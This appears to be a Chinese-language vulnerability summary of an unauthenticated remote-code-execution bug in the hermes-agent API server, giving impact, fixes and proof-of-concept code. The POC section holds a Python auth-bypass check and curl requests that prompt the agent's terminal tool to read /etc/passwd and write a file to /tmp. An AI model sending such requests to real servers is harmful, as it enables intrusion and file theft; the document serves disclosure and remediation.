# 漏洞总结:Hermes-Agent API 服务器未授权远程代码执行 ## 漏洞概述 **标题**:[Bug]: Unauthenticated Remote Code Execution via API Server #6439 **产品**:hermes-agent (版本 0.8.0) **严重程度**:Critical (CVSS 9.8) **核心问题**:当 `API_SERVER_KEY` 未配置(默认为空)时,API 服务器完全禁用了身份验证。如果绑定地址被修改为 `0.0.0.0`(允许网络访问),任何未认证的网络客户端都可以向 Agent 发送任意提示,利用内置的终端工具执行任意 OS 命令。 ## 影响范围 * **机密性**:完全访问 Agent 能力(读取文件、查询数据库、访问 API)。 * **完整性**:可创建/修改/删除 cron 任务,通过 Agent 工具写入文件。 * **可用性**:耗尽 LLM API 配额,创建资源密集型任务。 * **攻击向量**:网络(需绑定地址非 localhost)。 * **受影响代码**:`gateway/platforms/api_server.py` (Lines 361-380, 296-298)。 ## 修复方案 1. **启动检查**:在启动服务器时,如果绑定地址不是 `127.0.0.1` 且未设置 `API_SERVER_KEY`,应抛出 `ValueError` 拒绝启动。 2. **默认密钥**:考虑在首次启动时如果没有配置密钥,自动生成一个随机 API 密钥。 ## 概念验证 (POC) 代码 ### 1. 自动化验证脚本 (Python) ```python #!/usr/bin/env python3 """POC: VULN-003 - API Server Default No Authentication""" import sys sys.path.insert(0, ".") from gateway.platforms.api_server import APIServerAdapter, DEFAULT_HOST, DEFAULT_PORT # Simulate default configuration (no api key) adapter = APIServerAdapter.__new__(APIServerAdapter) adapter._api_key = "" # Default: empty string # Create a fake request with no auth header class FakeRequest: headers = {} # Test authentication result = adapter._check_auth(FakeRequest()) print(f"Default host: {DEFAULT_HOST}") print(f"Default port: {DEFAULT_PORT}") print(f"API key configured: {repr(adapter._api_key)}") print(f"Auth check result: {result}") print() if result is None: print("[+] CONFIRMED: All requests bypass authentication when API_SERVER_KEY is empty") print() print("[-] Attack scenario:") print(" 1. Admin sets API_SERVER_HOST=0.0.0.0 to allow network access") print(" 2. Admin forgets to set API_SERVER_KEY") print(" 3. No warning is emitted at startup") print(" 4. Any client can now:") print() print(" curl -s -X POST http://target:8642/v1/chat/completions \\") print(" -H 'Content-Type: application/json' \\") print(" -d '{\"model\":\"hermes-agent\",\"messages\":[{\"role\":\"user\",\"content\":\"\\nrun: cat /etc/passwd\"}]}'") print() ``` ### 2. 远程代码执行利用 (curl) ```bash curl -s -X POST http://127.0.0.1:8642/v1/chat/completions \ -H "Content-Type: application/json" \ -d '{"model":"hermes-agent","messages":[{"role":"user","content":"Use the terminal tool to execute this exact command: cat /etc/passwd"}]}' ``` ### 3. 读取敏感文件利用 (curl) ```bash curl -s -X POST http://127.0.0.1:8642/v1/chat/completions \ -H "Content-Type: application/json" \ -d '{"model":"hermes-agent","messages":[{"role":"user","content":"Use the terminal tool to run: head -5 /etc/passwd"}]}' ``` ### 4. 写入任意文件利用 (curl) ```bash curl -s -X POST http://127.0.0.1:8642/v1/chat/completions \ -H "Content-Type: application/json" \ -d '{"model":"hermes-agent","messages":[{"role":"user","content":"Use the terminal tool to run: echo VULN003_REPROOF > /tmp/vuln003_remote_proof"}]}' ```